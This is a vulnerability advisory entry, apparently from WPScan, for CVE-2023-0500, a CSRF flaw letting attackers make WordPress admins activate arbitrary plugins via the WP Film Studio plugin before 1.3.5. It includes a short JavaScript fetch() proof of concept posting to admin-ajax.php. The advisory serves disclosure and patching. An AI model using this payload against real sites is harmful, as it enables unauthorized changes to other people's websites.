Lucene search
Lana CodesWPVDB-ID:95A6A11E-DA5D-4FAC-AFF6-A3F7624682B7HistoryFeb 28, 2023 - 12:00 a.m.
WP Film Studio < 1.3.5 - Arbitrary Plugin Activation via CSRF
2023-02-2800:00:00
Lana Codes
wpscan.com
6
wordpress
plugin
csrf
activation
0.001 Low
EPSS
Percentile
29.9%
The plugin does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack
PoC
activate woocommerce plugin exploit: fetch(‘http://localhost/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=wpfilm-studio_ajax_plugin_activation&location;=woocommerce/woocommerce.php’, redirect: ‘follow’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error));
| CPE | Name | Operator | Version |
|---|---|---|---|
| wp-film-studio | lt | 1.3.5 |
Related
cvelist
cvelist
CVE-2023-0500 WP Film Studio < 1.3.5 - Arbitrary Plugin Activation via CSRF
2023-03-27 15:37:31
prion
prion
Cross site request forgery (csrf)
2023-03-27 16:15:00
cve
cve
CVE-2023-0500
2023-03-27 16:15:08
nvd
nvd
CVE-2023-0500
2023-03-27 16:15:08
wpexploit
wpexploit
WP Film Studio < 1.3.5 - Arbitrary Plugin Activation via CSRF
2023-02-28 00:00:00
wordfence
wordfence